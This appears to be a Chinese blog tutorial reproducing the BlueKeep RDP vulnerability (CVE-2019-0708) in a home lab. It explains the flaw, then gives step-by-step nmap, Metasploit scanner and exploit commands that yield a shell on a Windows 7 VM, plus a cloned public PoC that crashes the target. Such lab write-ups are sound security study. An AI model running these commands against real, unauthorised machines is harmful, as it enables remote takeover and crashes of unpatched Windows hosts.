文章目录

  • 一、 漏洞简介
    • 1、漏洞介绍:
    • 2、漏洞原理:
    • 3、影响版本:
  • 二、 漏洞复现
    • 复现环境:
    • 复现过程:
      • 1、主机发现:
      • 2、使用MSF的漏洞模块:
      • 3、对靶机进行漏洞扫描:
      • 4、使用攻击模块,对靶机进行攻击
      • 5、使用POC,进行蓝屏攻击

一、 漏洞简介

1、漏洞介绍:

2019年5月14日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCry 勒索病毒的传播方式类似。

2、漏洞原理:

存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。

3、影响版本:

目前已知受影响的 Windows 版本包括但不限于:

Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP

Windows 8 和 windows10 以及之后的版本不受此漏洞影响

二、 漏洞复现

复现环境:

  • 攻击机:Linux kali(IP:192.168.50.130)

  • 靶机:Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)

条件:两台机子可以相互ping通,并且靶机(无补丁)开启了3389端口,防火墙是关闭的!

复现过程:

1、主机发现:

登录 kali linux,用 nmap 探测本网段存活主机

nmap 192.168.50.0/24


可以看到靶机的3389端口是开放的。

2、使用MSF的漏洞模块:

打开MSF:msfconsole

搜索 CVE-2019-0708 漏洞模块

search cve-2019-0708


得到两个模块,一个是扫描功能,一个是攻击功能。

3、对靶机进行漏洞扫描:

使用模块:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

设置目标IP或网段:

set rhosts 192.168.50.132

执行扫描:run

结果显示靶机存在这个漏洞。

4、使用攻击模块,对靶机进行攻击

使用攻击模块:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

设置攻击目标IP

set rhosts 192.168.50.132

查看当前攻击配置

show options

执行攻击:exploit 或 run


发现攻击失败了,查了一下,知道这里还需要设置 target 参数,指定靶机的安装环境。这里默认是自动识别。

查看 target

show targets


1是真实机器,这里根据真实情况,选择5

set target 5

再次执行攻击


攻击成功!并且得到靶机的shell。

5、使用POC,进行蓝屏攻击

1、下载poc

git clone https://github.com/n1xbyte/cve-2019-0708

2、安装所需要的库

kali里默认没有pip3,先安装pip3,再安装impacket库

apt-get install python3-pippip3 install impacket

3、执行POC攻击

python3 crashpoc.py 192.168.50.132 64  #ip地址 系统版本


成功蓝屏!

CVE-2019-0708(BlueKeep)漏洞分析与复现相关推荐

  1. MS08-067漏洞分析与复现

    一名网络空间安全专业学生所做的漏洞复现实验,如有错误或有待改进的地方,还请大家多多指教. MS08-067漏洞分析与复现 目录 MS08-067漏洞分析与复现 1 前置知识 2 漏洞简介 3 漏洞代码 ...

  2. java 漏洞复现_CVE-2019-12384漏洞分析及复现

    原标题:CVE-2019-12384漏洞分析及复现 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 引言 近期关于Jackson的 ...

  3. CVE-2020-1472 Netlogon特权提升漏洞分析及复现

    0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务.最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新 ...

  4. Apache Commons Collections反序列化漏洞分析与复现

     聚焦源代码安全,网罗国内外最新资讯! 1.1 状态 完成漏洞挖掘条件分析.漏洞复现. 1.2 漏洞分析 存在安全缺陷的版本:Apache Commons Collections3.2.1以下,[JD ...

  5. Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现

    0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单.有效.统一的 ...

  6. ThinkPHP V5.0.5漏洞_ThinkPHP 5.x 远程命令执行漏洞分析与复现

    php中文网最新课程 每日17点准时技术干货分享 0x00 前言 ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新 ...

  7. 一次历史漏洞分析与复现的全部过程

    环境需求 系统:Windows10 中间件:https://dlcdn.apache.org/tomcat/tomcat-9/v9.0.58/bin/apache-tomcat-9.0.58-wind ...

  8. CVE-2017-8464震网3.0漏洞分析与复现

    概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该 ...

  9. MS17-010(永恒之蓝)漏洞分析与复现

    文章目录 一.漏洞简介 1.永恒之蓝介绍: 2.漏洞原理: 3.影响版本: 二.漏洞复现 复现环境: 复现过程: 1.主机发现: 2.使用MSF的永恒之蓝漏洞模块 3.使用ms17-010扫描模块,对 ...

最新文章

  1. 【动态规划】最长公共子序列与最长公共子串
  2. hive 数据迁移SQL
  3. 增大iphone音量技巧_就算我们把手机音量开到最大!外放声音还是小,那是这个设置没开...
  4. 【跃迁之路】【429天】程序员高效学习方法论探索系列(实验阶段186-2018.04.10)...
  5. 零基础学python知乎-编程零基础应当如何开始学习 Python?
  6. node + ts读取csv文件为二维数组
  7. 【python】10行代码下载B站弹幕
  8. 信息论——信源信息量和信息熵
  9. jsp综合开发实例——夏日九宫格日记网
  10. 实型变量(浮点型变量)、字符型数据、字符串常量(变量)、字符常量(变量)
  11. win10系统安装到服务器失败怎么回事,小编教你win10安装失败怎么办
  12. 嵌入式Linux之正点原子Linux开发板入手
  13. 渐进式web应用程序_为什么渐进式Web应用程序很棒,以及如何构建一个
  14. 最实用整理!大数据搜索引擎工具有哪些?
  15. 阿里云搭建svn服务器
  16. RTOS的基本概念与线程基础知识
  17. 疯狂Java讲义(读书笔记)(第五章)
  18. 腾讯大佬的 Python 编码规范
  19. FM调制的FPGA实现
  20. 【xdoj难题集】1202 The Offer - Lunatic(附优化版)

热门文章

  1. 三十二、VsCode前端的开发工具介绍和使用
  2. 六十一、Python中的smtplib和email实现邮件发送
  3. GAN处理手写图片数据集
  4. django自定义过滤器及模板标签
  5. ChildTuning:试试把Dropout加到梯度上去?
  6. 结合随机微分方程,多大Duvenaud团队提出无限深度贝叶斯神经网络
  7. 谷歌自锤Attention:纯注意力并没那么有用,Transformer组件很重要
  8. java第六章工具包P6-03.Optional 2020.4.?
  9. 飞桨抠图直播2020.4.1
  10. Anaconda安装和使用指南教程:环境管理、包管理、离线安装第三方包